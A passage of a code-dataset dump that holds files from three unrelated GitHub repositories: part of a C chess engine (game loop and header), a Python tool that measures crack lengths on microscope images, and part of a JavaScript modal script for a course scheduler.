arrivingPos = -1;\r\n\tMove lastMove = 0;\r\n\r\n\twhile( run ) {\r\n\t\trenderBoard(game.position.board, color, lastMove);\r\n\r\n\t\tif ( hasAI && ongoing && !editing && game.position.toMove == opponent(color) ) {\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game - Calculating move...\");\r\n\t\t\tlastMove = getAIMove(&game, AIdepth);\r\n\t\t\tmakeMove(&game, lastMove);\r\n\t\t\tSDL_SetWindowTitle(window, \"Chess Game\");\r\n\t\t\trenderBoard(game.position.board, color, lastMove);\r\n\r\n\t\t\tif ( hasGameEnded(&game.position) ) {\r\n\t\t\t\tongoing = FALSE;\r\n\t\t\t\tsetEndTitle(&game.position);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\twhile( SDL_PollEvent( &event ) == 0 );\r\n\t\thandleEvent(event, &game, &color, &hasAI, &AIdepth, &run, &ongoing, &editing, &leavingPos, &arrivingPos, &lastMove);\r\n\t}\r\n}\r\n\r\nvoid playAIRandomColor(int depth) {\r\n\tchar colors[] = {WHITE, BLACK};\r\n\tchar color = colors[rand()%2];\r\n\tplay(color, TRUE, depth);\r\n}\r\n\r\nvoid playAlone() { play(WHITE, FALSE, 0); }\r\n\r\nint main( int argc, char* args[] ) {\r\n\tif ( !init() ) {\r\n\t\tfflush(stdout);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tplayAIRandomColor(DEFAULT_AI_DEPTH);\r\n//\tplayAlone();\r\n\r\n//\tprintf(\"Position\\t%d bytes\\n\", sizeof(Position));\r\n//\tprintf(\"Board\\t\\t%d bytes\\n\", NUM_SQUARES*sizeof(int));\r\n//\tprintf(\"To move\\t\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"En passant\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"Castling\\t%d bytes\\n\", sizeof(char));\r\n//\tprintf(\"Half move\\t%d bytes\\n\", sizeof(int));\r\n//\tprintf(\"Full move\\t%d bytes\\n\", sizeof(int));\r\n//\tfflush(stdout);\r\n\r\n\tclose();\r\n\r\n\treturn EXIT_SUCCESS;\r\n}\r\n" }, { "alpha_fraction": 0.6798844933509827, "alphanum_fraction": 0.7145422101020813, "avg_line_length": 32.90735626220703, "blob_id": "39bdac3dc2f5c0b8eb5acf8cb3f5fc12f4fe2a07", "content_id": "d726724461471a9a01b5e63953212216cfedef14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 12811, "license_type": "permissive", "max_line_length": 163, "num_lines": 367, "path": 
"/include/fast-chess.h", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\r\n * fast-chess.h\r\n *\r\n * Created on: 20 de set de 2016\r\n * Author: fvj\r\n */\r\n\r\n#ifndef FAST_CHESS_H_\r\n#define FAST_CHESS_H_\r\n\r\n#ifdef _WIN32\r\n#include <windows.h>\r\n#endif\r\n\r\n#include <stdint.h>\r\n\r\n#define ENGINE_VERSION \"v1.6.3\"\r\n\r\n#define ENGINE_NAME \"github.com/fredericojordan/fast-chess \" ENGINE_VERSION\r\n#define HUMAN_NAME \"Unknown Human Player\"\r\n\r\n#define NUM_SQUARES (64)\r\n#define ENDGAME_PIECE_COUNT (7)\r\n\r\n#define COLOR_MASK (1<<3)\r\n#define WHITE (0)\r\n#define BLACK (1<<3)\r\n\r\n#define PIECE_MASK (0x7)\r\n#define EMPTY (0)\r\n#define PAWN (1)\r\n#define KNIGHT (2)\r\n#define BISHOP (3)\r\n#define ROOK (4)\r\n#define QUEEN (5)\r\n#define KING (6)\r\n\r\n#define ALL_SQUARES (0xFFFFFFFFFFFFFFFF)\r\n#define FILE_A (0x0101010101010101)\r\n#define FILE_B (0x0202020202020202)\r\n#define FILE_C (0x0404040404040404)\r\n#define FILE_D (0x0808080808080808)\r\n#define FILE_E (0x1010101010101010)\r\n#define FILE_F (0x2020202020202020)\r\n#define FILE_G (0x4040404040404040)\r\n#define FILE_H (0x8080808080808080)\r\n#define RANK_1 (0x00000000000000FF)\r\n#define RANK_2 (0x000000000000FF00)\r\n#define RANK_3 (0x0000000000FF0000)\r\n#define RANK_4 (0x00000000FF000000)\r\n#define RANK_5 (0x000000FF00000000)\r\n#define RANK_6 (0x0000FF0000000000)\r\n#define RANK_7 (0x00FF000000000000)\r\n#define RANK_8 (0xFF00000000000000)\r\n#define DIAG_A1H8 (0x8040201008040201)\r\n#define ANTI_DIAG_H1A8 (0x0102040810204080)\r\n#define LIGHT_SQUARES (0x55AA55AA55AA55AA)\r\n#define DARK_SQUARES (0xAA55AA55AA55AA55)\r\n\r\n#define CASTLE_KINGSIDE_WHITE (1<<0)\r\n#define CASTLE_QUEENSIDE_WHITE (1<<1)\r\n#define CASTLE_KINGSIDE_BLACK (1<<2)\r\n#define CASTLE_QUEENSIDE_BLACK (1<<3)\r\n\r\n#define BOOL char\r\n\r\n#ifndef FALSE\r\n#define TRUE (1)\r\n#define FALSE (0)\r\n#endif\r\n\r\ntypedef uint_fast64_t Bitboard;\r\ntypedef int Move;\r\n\r\n#define MAX_BOOK_ENTRY_LEN (300)\r\n#define MAX_PLYS_PER_GAME (1024)\r\n#define MAX_FEN_LEN (100)\r\n#define MAX_BRANCHING_FACTOR (218) /* R6R/3Q4/1Q4Q1/4Q3/2Q4Q/Q4Q2/pp1Q4/kBNN1KB1 w - - 0 1 3Q4/1Q4Q1/4Q3/2Q4R/Q4Q2/3Q4/1Q4Rp/1K1BBNNk w - - 0 1 */\r\n#define MAX_ATTACKING_PIECES (12)\r\n\r\n#define DEFAULT_AI_DEPTH (3)\r\n\r\ntypedef struct {\r\n int board[NUM_SQUARES];\r\n char toMove;\r\n char epSquare;\r\n char castlingRights;\r\n unsigned int halfmoveClock;\r\n unsigned int fullmoveNumber;\r\n} Position;\r\n\r\ntypedef struct {\r\n\tPosition position;\r\n\r\n\tunsigned int moveListLen;\r\n\tMove moveList[MAX_PLYS_PER_GAME];\r\n\tchar positionHistory[MAX_PLYS_PER_GAME][MAX_FEN_LEN];\r\n} Game;\r\n\r\ntypedef struct {\r\n\tMove move;\r\n\tint score;\r\n} Node;\r\n\r\ntypedef struct {\r\n\tint depth;\r\n\tPosition pos;\r\n\tint * alpha;\r\n\tint * beta;\r\n\tBOOL verbose;\r\n} ThreadInfo;\r\n\r\nextern char FILES[8];\r\nextern char RANKS[8];\r\n\r\nextern Bitboard FILES_BB[8];\r\nextern Bitboard RANKS_BB[8];\r\n\r\nextern char INITIAL_FEN[];\r\nextern int INITIAL_BOARD[NUM_SQUARES];\r\nextern int PIECE_VALUES[];\r\n\r\n#define DOUBLED_PAWN_PENALTY (10)\r\n#define ISOLATED_PAWN_PENALTY (20)\r\n#define BACKWARDS_PAWN_PENALTY (8)\r\n#define PASSED_PAWN_BONUS (20)\r\n#define ROOK_SEMI_OPEN_FILE_BONUS (10)\r\n#define ROOK_OPEN_FILE_BONUS (15)\r\n#define ROOK_ON_SEVENTH_BONUS (20)\r\n\r\nextern int PAWN_BONUS[];\r\nextern int KNIGHT_BONUS[];\r\nextern int BISHOP_BONUS[];\r\nextern int KING_BONUS[];\r\nextern int 
KING_ENDGAME_BONUS[];\r\nextern int FLIP_VERTICAL[];\r\n\r\nvoid getInitialGame(Game * game);\r\nvoid getFenGame(Game * game, char fen[]);\r\nint loadFen(Position * position, char fen[]);\r\nint toFen(char * fen, Position * position);\r\nint toMinFen(char * fen, Position * position);\r\n\r\n// ========= UTILITY =========\r\n\r\nBOOL fromInitial(Game * game);\r\nBitboard index2bb(int index);\r\nint str2index(char *str);\r\nBitboard str2bb(char *str);\r\nBOOL isSet(Bitboard bb, int index);\r\nBitboard lsb(Bitboard bb);\r\nBitboard msb(Bitboard bb);\r\nint bb2index(Bitboard bb);\r\nchar * movelist2str(Game * game);\r\nMove getLastMove(Game * game);\r\nBOOL startsWith(const char *str, const char *pre);\r\nint countBookOccurrences(Game * game);\r\nMove getBookMove(Game * game);\r\nchar getFile(int position);\r\nchar getRank(int position);\r\nMove generateMove(int leavingSquare, int arrivingSquare);\r\nint getFrom(Move move);\r\nint getTo(Move move);\r\nint char2piece(char pieceCode);\r\nchar piece2char(int piece);\r\nchar * piece2str(int piece);\r\nvoid printBitboard(Bitboard bitboard);\r\nvoid printBoard(int board[]);\r\nvoid printGame(Game * game);\r\nBitboard not(Bitboard bb);\r\nchar opponent(char color);\r\nint countBits(Bitboard bb);\r\nvoid sortNodes(Node * sortedNodes, Node * nodes, int len, char color);\r\nvoid printMove(Move move);\r\nvoid printFullMove(Move move, int board[]);\r\nvoid printLegalMoves(Position * position);\r\nvoid printNode(Node node);\r\nvoid getTimestamp(char * timestamp);\r\nvoid dumpContent(Game * game);\r\nvoid dumpPGN(Game * game, char color, BOOL hasAI);\r\nvoid move2str(char * str, Game * game, int moveNumber);\r\nBOOL isAmbiguous(Position * posBefore, Move move);\r\nunsigned long hashPosition(Position * position);\r\nvoid writeToHashFile(Position * position, int evaluation, int depth);\r\n\r\n// ====== BOARD FILTERS ======\r\n\r\nBitboard getColoredPieces(int board[], char color);\r\nBitboard getEmptySquares(int board[]);\r\nBitboard getOccupiedSquares(int board[]);\r\nBitboard getPieces(int board[], int pieceType);\r\nBitboard fileFilter(Bitboard positions);\r\nBitboard rankFilter(Bitboard positions);\r\nchar countPieces(Bitboard bitboard);\r\n\r\n// ======= DIRECTIONS ========\r\n\r\nBitboard east(Bitboard bb);\r\nBitboard west(Bitboard bb);\r\nBitboard north(Bitboard bb);\r\nBitboard south(Bitboard bb);\r\nBitboard NE(Bitboard bb);\r\nBitboard NW(Bitboard bb);\r\nBitboard SE(Bitboard bb);\r\nBitboard SW(Bitboard bb);\r\nBitboard WNW(Bitboard moving_piece);\r\nBitboard ENE(Bitboard moving_piece);\r\nBitboard NNW(Bitboard moving_piece);\r\nBitboard NNE(Bitboard moving_piece);\r\nBitboard ESE(Bitboard moving_piece);\r\nBitboard WSW(Bitboard moving_piece);\r\nBitboard SSE(Bitboard moving_piece);\r\nBitboard SSW(Bitboard moving_piece);\r\n\r\n// ========== PAWN ===========\r\n\r\nBitboard getPawns(int board[]);\r\nBitboard pawnSimplePushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnDoublePushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnPushes(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnEastAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnWestAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnSimpleCaptures(Bitboard moving_piece, int board[], char color);\r\nBitboard pawnEpCaptures(Bitboard moving_piece, Position * position, char color);\r\nBitboard pawnCaptures(Bitboard 
moving_piece, Position * position, char color);\r\nBitboard pawnMoves(Bitboard moving_piece, Position * position, char color);\r\nBOOL isDoublePush(int leaving, int arriving);\r\nchar getEpSquare(int leaving);\r\nBOOL isDoubledPawn(Bitboard position, int board[]);\r\nBOOL isIsolatedPawn(Bitboard position, int board[]);\r\nBOOL isBackwardsPawn(Bitboard position, int board[]);\r\nBOOL isPassedPawn(Bitboard position, int board[]);\r\nBOOL isOpenFile(Bitboard position, int board[]);\r\nBOOL isSemiOpenFile(Bitboard position, int board[]);\r\n\r\n// ========== KNIGHT =========\r\n\r\nBitboard getKnights(int board[]);\r\nBitboard knightAttacks(Bitboard moving_piece);\r\nBitboard knightMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== KING ===========\r\n\r\nBitboard getKing(int board[], char color);\r\nBitboard kingAttacks(Bitboard moving_piece);\r\nBitboard kingMoves(Bitboard moving_piece, int board[], char color) ;\r\nBOOL canCastleKingside(Position * position, char color);\r\nBOOL canCastleQueenside(Position * position, char color);\r\nchar removeCastlingRights(char original_rights, char removed_rights);\r\n\r\n// ========== BISHOP =========\r\n\r\nBitboard getBishops(int board[]);\r\nBitboard NE_ray(Bitboard bb);\r\nBitboard SE_ray(Bitboard bb);\r\nBitboard NW_ray(Bitboard bb);\r\nBitboard SW_ray(Bitboard bb);\r\nBitboard NE_attack(Bitboard single_piece, int board[], char color);\r\nBitboard NW_attack(Bitboard single_piece, int board[], char color);\r\nBitboard SE_attack(Bitboard single_piece, int board[], char color);\r\nBitboard SW_attack(Bitboard single_piece, int board[], char color);\r\nBitboard diagonalAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard antiDiagonalAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard bishopAttacks(Bitboard moving_pieces, int board[], char color);\r\nBitboard bishopMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== ROOK ===========\r\n\r\nBitboard getRooks(int board[]);\r\nBitboard northRay(Bitboard moving_pieces);\r\nBitboard southRay(Bitboard moving_pieces);\r\nBitboard eastRay(Bitboard moving_pieces);\r\nBitboard westRay(Bitboard moving_pieces);\r\nBitboard northAttack(Bitboard single_piece, int board[], char color);\r\nBitboard southAttack(Bitboard single_piece, int board[], char color);\r\nBitboard fileAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard eastAttack(Bitboard single_piece, int board[], char color);\r\nBitboard westAttack(Bitboard single_piece, int board[], char color);\r\nBitboard rankAttacks(Bitboard single_piece, int board[], char color);\r\nBitboard rookAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard rookMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ========== QUEEN ==========\r\n\r\nBitboard getQueens(int board[]);\r\nBitboard queenAttacks(Bitboard moving_piece, int board[], char color);\r\nBitboard queenMoves(Bitboard moving_piece, int board[], char color);\r\n\r\n// ======== MAKE MOVE ========\r\n\r\nvoid movePiece(int board[], Move move);\r\nvoid updatePosition(Position * newPosition, Position * position, Move move);\r\nvoid makeMove(Game * game, Move move);\r\nvoid unmakeMove(Game * game);\r\n\r\n// ======== MOVE GEN =========\r\n\r\nBitboard getMoves(Bitboard movingPiece, Position * position, char color);\r\nint pseudoLegalMoves(Move * moves, Position * position, char color);\r\nBitboard getAttacks(Bitboard movingPiece, int board[], char color);\r\nint countAttacks(Bitboard target, int 
board[], char color);\r\nBOOL isAttacked(Bitboard target, int board[], char color);\r\nBOOL isCheck(int board[], char color);\r\nBOOL isLegalMove(Position * position, Move move);\r\nint legalMoves(Move * legalMoves, Position * position, char color);\r\nint legalMovesCount(Position * position, char color);\r\nint staticOrderLegalMoves(Move * orderedLegalMoves, Position * position, char color);\r\nint legalCaptures(Move * legalCaptures, Position * position, char color);\r\n\r\n// ====== GAME CONTROL =======\r\n\r\nBOOL isCheckmate(Position * position);\r\nBOOL isStalemate(Position * position);\r\nBOOL hasInsufficientMaterial(int board[]);\r\nBOOL isEndgame(int board[]);\r\nBOOL isOver75MovesRule(Position * position);\r\nBOOL hasGameEnded(Position * position);\r\nvoid printOutcome(Position * position);\r\n\r\n// ========== EVAL ===========\r\n\r\nint winScore(char color);\r\nint materialSum(int board[], char color);\r\nint materialBalance(int board[]);\r\nint positionalBonus(int board[], char color);\r\nint positionalBalance(int board[]);\r\nint endNodeEvaluation(Position * position);\r\nint staticEvaluation(Position * position);\r\nint getCaptureSequence(Move * captures, Position * position, int targetSquare);\r\nint staticExchangeEvaluation(Position * position, int targetSquare);\r\nint quiescenceEvaluation(Position * position);\r\n\r\n// ========= SEARCH ==========\r\n\r\nNode staticSearch(Position * position);\r\nNode quiescenceSearch(Position * position);\r\nNode alphaBeta(Position * position, char depth, int alpha, int beta);\r\nint alphaBetaNodes(Node * nodes, Position * position, char depth);\r\nNode iterativeDeepeningAlphaBeta(Position * position, char depth, int alpha, int beta, BOOL verbose);\r\nNode pIDAB(Position * position, char depth, int * p_alpha, int * p_beta);\r\nNode pIDABhashed(Position * position, char depth, int * p_alpha, int * p_beta);\r\nMove getRandomMove(Position * position);\r\nMove getAIMove(Game * game, int depth);\r\nMove parseMove(char * move);\r\nMove getPlayerMove();\r\nMove suggestMove(char fen[], int depth);\r\n\r\n// Parallel processing currently only implemented for Windows\r\n#ifdef _WIN32\r\nDWORD WINAPI evaluatePositionThreadFunction(LPVOID lpParam);\r\nDWORD WINAPI evaluatePositionThreadFunctionHashed(LPVOID lpParam);\r\nNode idabThreaded(Position * position, int depth, BOOL verbose);\r\nNode idabThreadedBestFirst(Position * position, int depth, BOOL verbose);\r\nNode idabThreadedBestFirstHashed(Position * position, int depth, BOOL verbose);\r\n#endif\r\n\r\n// ===== PLAY LOOP (TEXT) ====\r\n\r\nvoid playTextWhite(int depth);\r\nvoid playTextBlack(int depth);\r\nvoid playTextAs(char color, int depth);\r\nvoid playTextRandomColor(int depth);\r\n\r\n// ===========================\r\n\r\n#endif /* FAST_CHESS_H_ */\r\n" } ]
9
nolanlad/lab
https://github.com/nolanlad/lab
288896854c64d1e53fbe29c153f8410a9821b38b
01650ae980bc05f4fc57af58586f0d2ccb4decda
59d0ce0aed39702c209b191f52048a27fce07804
refs/heads/master
2020-04-24T00:36:39.771583
2019-02-20T00:16:07
2019-02-20T00:16:07
171,571,054
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49947577714920044, "alphanum_fraction": 0.5221220254898071, "avg_line_length": 27.052940368652344, "blob_id": "183a1f40387588425e78978a557d8b3259d9c961", "content_id": "43600c77ea9f9fc4373243fe88d6722eb9a81b05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4769, "license_type": "no_license", "max_line_length": 112, "num_lines": 170, "path": "/crackmeasure.py", "repo_name": "nolanlad/lab", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot as plt\nimport numpy as np\nfrom copy import copy\nimport json\nimport glob\n\nclass LineBuilder:\n def __init__(self, line):\n self.line = line\n self.even = False\n self.line_list = []\n self._line = Line()\n self.count = 0\n self.cid = line.figure.canvas.mpl_connect('button_press_event', self)\n \n\n def __call__(self, event):\n if event.inaxes!=self.line.axes: return\n if(event.key == 'shift'):\n print(\"zoom\")\n return\n if self.even:\n self._line.x2 = event.xdata\n self._line.y2 = event.ydata\n \n self.line.set_data([self._line.x1,self._line.x2] ,\n [self._line.y1, self._line.y2])\n self._line.id = self.count\n self.count += 1\n self.line_list.append(copy(self._line))\n self.line.figure.canvas.draw()\n else:\n self._line.x1 = event.xdata\n self._line.y1 = event.ydata\n self.even = (not self.even)\n\nclass Line:\n def __init__(self, x1=None, y1=None, x2=None, y2=None):\n self.id = None\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def length(self,x_scale,y_scale):\n self.length = get_length([self.x1,self.x2],\n [self.y1,self.y2],\n x_scale,y_scale)\n \n\ndef draw_lines(img,prefix):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n info = read_hdr(img.replace(\".tif\",\"-tif.hdr\"))\n xscale,yscale = float(info['PixelSizeX']),float(info['PixelSizeY'])\n line_list = linebuilder.line_list\n for i in line_list:\n i.length(xscale,yscale)\n fp = open(img+prefix+\".json\",'a')\n json.dump([i.__dict__ for i in line_list],fp)\n #return line_list\n\ndef test_lines(img,prefix):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n \n\ndef get_length(xs,ys,x_scale,y_scale):\n dx = xs[0] - xs[1]\n dy = ys[0] - ys[1]\n dx = dx*x_scale\n dy = dy*y_scale\n return np.sqrt(dx**2 + dy**2)\n\ndef read_hdr(fname):\n f = open(fname)\n lines = f.read().split('\\n')\n keys = {}\n for line in lines:\n if \"=\" in line:\n temp = line.split(\"=\")\n keys[temp[0]] = temp[1]\n return keys\n\ndef draw_with_lines(img,prefix,files):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n lines = []\n for f in files:\n dump = json.load(open(f))\n for j in dump:\n x1 = j['x1']\n x2 = j['x2']\n y1 = j['y1']\n y2 = j['y2']\n plt.plot([x1,x2],[y1,y2],'b-')\n \n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n info = read_hdr(img.replace(\".tif\",\"-tif.hdr\"))\n xscale,yscale = float(info['PixelSizeX']),float(info['PixelSizeY'])\n line_list = linebuilder.line_list\n for i in line_list:\n i.length(xscale,yscale)\n fp = open(img+\".\"+prefix+\".json\",'a')\n print(img+\".\"+prefix+\".json\")\n json.dump([i.__dict__ for i 
in line_list],fp)\n return line_list\n\ndef all_files(pattern):\n v = []\n for d in dirs:\n v.extend(glob.glob(\"/home/nolan/Desktop/101018_HNS_2-4/%s/%s\"%(d,pattern)))\n return v\n\ndef main(crack_number):\n fils = all_files(\"panorama.tif.crack[0-9].json\")\n #dirs.reverse()\n for d in dirs:\n fils = all_files(\"panorama.tif.crack[0-9].json\")\n draw_with_lines(\"/home/nolan/Desktop/101018_HNS_2-4/%s/panorama.tif\"%(d),\"crack%d\"%(crack_number), fils)\n if(input() == 'q'):\n break\n\ndef get_crack_length(files):\n points = []\n for f in files:\n data = json.load(open(f))\n if data != []:\n points.append(\n np.average(\n [d['length'] for d in data]))\n return points\n\ndef show_all_crack(files,pattern):\n for f in files:\n im = plt.imread(f.replace(pattern,\".tif\"))\n plt.imshow(im)\n dump = json.load(open(f))\n for j in dump:\n x1 = j['x1']\n x2 = j['x2']\n y1 = j['y1']\n y2 = j['y2']\n plt.plot([x1,x2],[y1,y2],'b-')\n plt.show()\n \n \n\ndirs = ['0N', '41N','61N','78N','99N','118N','139N','170N','190N','Failure']\ndirs.reverse()\n" } ]
1
WilawanLelapratak/OX
https://github.com/WilawanLelapratak/OX
a4646c63a21f891e46981b24b5cccc933c3d457b
2241daa9c4eeb858f1beee8aa33ebc323fdc181d
dc0cc6dabbdc32659a1fd8a1729c72e3860c5139
refs/heads/master
2020-06-09T15:28:31.728076
2016-12-22T06:06:20
2016-12-22T06:06:20
76,030,983
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5225903391838074, "alphanum_fraction": 0.5564758777618408, "avg_line_length": 39.7361946105957, "blob_id": "6d0f5ac95d7e192590c5dd570eb2ab533ed01c19", "content_id": "ddb09af921497865ca34f9a0499b2e21d2e2f06b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6640, "license_type": "no_license", "max_line_length": 161, "num_lines": 163, "path": "/FinalGame.py", "repo_name": "WilawanLelapratak/OX", "src_encoding": "UTF-8", "text": "import tkinter\nimport random\nfrom itertools import permutations\n\nclass Player :\n def __init__(self, name, color) :\n self.name = name\n self.color = color\n self.selected_sq = set()\n\nclass Board :\n def __init__(self, parent, sq_size, color) :\n self.parent = parent\n self.sq_size = sq_size\n self.color = color\n self._victory_ways = [{1, 2, 3, 4}, {5, 6, 7, 8}, {9, 10, 11, 12}, {13, 14, 15, 16}, #row victory\n {1, 5, 9, 13}, {2, 6, 10, 14}, {3, 7, 11, 15}, {4, 8, 12, 16}, #column victory\n {1, 6, 11, 16}, {4, 7, 10, 13}] #cross victory\n self.unused_squares_dict = { '00': 1, '10': 2, '20': 3, '30' : 4,\n '01': 5, '11': 6, '21': 7, '31' : 8,\n '02': 9, '12': 10, '22': 11, '32' : 12,\n '03': 13, '13': 14, '23': 15, '33' : 16}\n self.container = tkinter.Frame(self.parent)\n self.container.pack()\n self.canvas = tkinter.Canvas(self.container, width = self.sq_size * 4, height = self.sq_size * 4)\n self.canvas.grid()\n\n def get_unused_squares_dict(self) :\n return self.unused_squares_dict\n\n def reset_unused_squares_dict(self) :\n self.unused_squares_dict = { '00': 1, '10': 2, '20': 3, '30' : 4,\n '01': 5, '11': 6, '21': 7, '31' : 8,\n '02': 9, '12': 10, '22': 11, '32' : 12,\n '03': 13, '13': 14, '23': 15, '33' : 16}\n\n def draw_board(self) :\n for row in range(4) :\n for(column) in range(4) :\n self.canvas.create_rectangle(self.sq_size * column, self.sq_size * row, self.sq_size * (column + 1), self.sq_size * (row + 1), fill = self.color)\n\n def get_row_col(self, evt) :\n return evt.x, evt.y\n\n def floor_of_row_col(self, col, rw) :\n col_flr = col // self.sq_size\n rw_flr = rw // self.sq_size\n return col_flr, rw_flr\n\n def convert_to_key(self, col_floor, row_floor) :\n return str(col_floor) + str(row_floor)\n\n def find_coords_of_selected_sq(self, evt):\n column, row = self.get_row_col(evt)\n column_floor, row_floor = self.floor_of_row_col(column, row)\n rowcol_key_str = self.convert_to_key(column_floor, row_floor)\n corner_column = (column_floor * self.sq_size) + self.sq_size\n corner_row = (row_floor * self.sq_size) + self.sq_size\n return corner_column, corner_row\n\n def color_selected_sq(self, evt, second_corner_col, second_corner_row, player_color) :\n self.canvas.create_rectangle(\n (evt.x // self.sq_size) * self.sq_size,\n (evt.y // self.sq_size) * self.sq_size,\n second_corner_col,\n second_corner_row,\n fill = player_color)\n\n @property\n def victory_ways(self) :\n return self._victory_ways\n\nclass GamePlay(object) :\n def __init__(self, parent) :\n self.parent = parent\n self.board = Board(self.parent, 100, \"#ECECEC\")\n self.board.draw_board()\n self.unused_squares_dict = self.board.get_unused_squares_dict()\n self.player1 = Player(\"Player 1\", \"#1DE9B6\")\n self.player2 = Player(\"Player 2\", \"#FFA726\")\n self.initialize_buttons()\n self.show_menu()\n\n def initialize_buttons(self) :\n self.two_players_button = tkinter.Button(self.board.container, text = \"TWO PLAYERS\", width = 25, command = self.init_two_players_game)\n self.restart_button = 
tkinter.Button(self.board.container, text = \"RESTART\", width = 25, command = self.restart)\n\n def show_menu(self) :\n self.two_players_button.grid()\n\n def init_two_players_game(self) :\n self.board.reset_unused_squares_dict()\n self.player1.selected_sq = set()\n self.player2.selected_sq = set()\n self.player1_turn = True\n self.restart_button.grid()\n self.board.canvas.bind(\"<Button-1>\", self.play)\n\n def restart(self) :\n self.board.container.destroy()\n self.board = Board(self.parent, 100, \"#ECECEC\")\n self.board.draw_board()\n self.initialize_buttons()\n self.show_menu()\n\n def add_to_player_sq(self, key, player_sq) :\n current_selected_sq = self.board.unused_squares_dict[key]\n player_sq.add(current_selected_sq)\n\n def delete_used_sq(self, key) :\n del self.board.unused_squares_dict[key]\n\n def play(self, event) :\n colrow_tuple = self.board.find_coords_of_selected_sq(event)\n corner_two_col, corner_two_row = colrow_tuple[0], colrow_tuple[1]\n col_fl, row_fl = self.board.floor_of_row_col(event.x, event.y)\n rowcol_key = self.board.convert_to_key(col_fl, row_fl)\n\n try :\n self.unused_squares_dict[rowcol_key]\n except KeyError :\n return\n\n if self.player1_turn == True :\n self.add_to_player_sq(rowcol_key, self.player1.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.board.color_selected_sq(event, corner_two_col, corner_two_row, self.player1.color)\n self.check_for_winner(self.player1.selected_sq, self.player1.name)\n self.player1_turn = False\n\n else :\n self.board.color_selected_sq(event, corner_two_col, corner_two_row, self.player2.color)\n self.add_to_player_sq(rowcol_key, self.player2.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.check_for_winner(self.player2.selected_sq, self.player2.name)\n self.player1_turn = True\n\n def check_for_winner(self, player_sq, player_name) :\n if len(self.board.unused_squares_dict) > 0 :\n if len(player_sq) > 2 :\n for combo in permutations(player_sq, 4) :\n for wc in self.board.victory_ways :\n if set(combo) == wc :\n self.show_game_result(player_name + \" WIN!\")\n self.restart\n\n if len(self.board.unused_squares_dict) == 0 :\n self.show_game_result(\"Game Tie!\")\n self.restart\n\n def show_game_result(self, txt) :\n result_label = tkinter.Label(self.board.container, text = txt, width = 32, height = 10, foreground = \"white\", background = \"black\", borderwidth = 3)\n result_label.grid(row = 0, column = 0)\n self.board.canvas.unbind(\"<Button-1>\", self.play)\n\ndef main() :\n root = tkinter.Tk()\n root.title(\"OX Special 4x4\")\n ox_game = GamePlay(root)\n root.mainloop()\n\nif __name__ == '__main__' :\n main()\n" } ]
1
GPAlzate/SageSchedule
https://github.com/GPAlzate/SageSchedule
e826f0dd30c431d1e199869adef24cbb3bb1222e
41917a47fd78d1dcafc7ecdfa9b6ef5808ca8e61
06caf284f40ea25a46fb141ea9011d32e6e80793
refs/heads/main
2023-04-29T21:44:49.058778
2021-05-13T06:32:34
2021-05-13T06:32:34
358,098,912
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5902985334396362, "alphanum_fraction": 0.591791033744812, "avg_line_length": 28.14130401611328, "blob_id": "b027413752d74542f6653a34497f1f48be238618", "content_id": "b9c9d96b098b589b07ca878a549db509ac3eea65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2680, "license_type": "no_license", "max_line_length": 100, "num_lines": 92, "path": "/static/main.js", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "// save toggled elements in a list to toggle their 'hidden' back after modal closes\nvar toggledElts = []\nvar selectedCourse = null\n\nconst overlay = document.querySelector('.modal-overlay')\noverlay.addEventListener('click', toggleModal)\n\ndocument.querySelectorAll('.modal-close').forEach((modal)=>{\n modal.addEventListener('click', toggleModal)\n})\n\ndocument.onkeydown = function(evt) {\n evt = evt || window.event\n var isEscape = false\n if (\"key\" in evt) {\n isEscape = (evt.key === \"Escape\" || evt.key === \"Esc\")\n } else {\n isEscape = (evt.keyCode === 27)\n }\n if (isEscape && document.body.classList.contains('modal-active')) {\n toggleModal()\n }\n};\n\nfunction toggleModal(course) {\n selectedCourse = course\n const body = document.querySelector('body')\n const modal = document.querySelector('.modal')\n modal.classList.toggle('opacity-0')\n modal.classList.toggle('pointer-events-none')\n var isToggled = body.classList.toggle('modal-active')\n\n if (isToggled) {\n\n // untoggle previous text\n 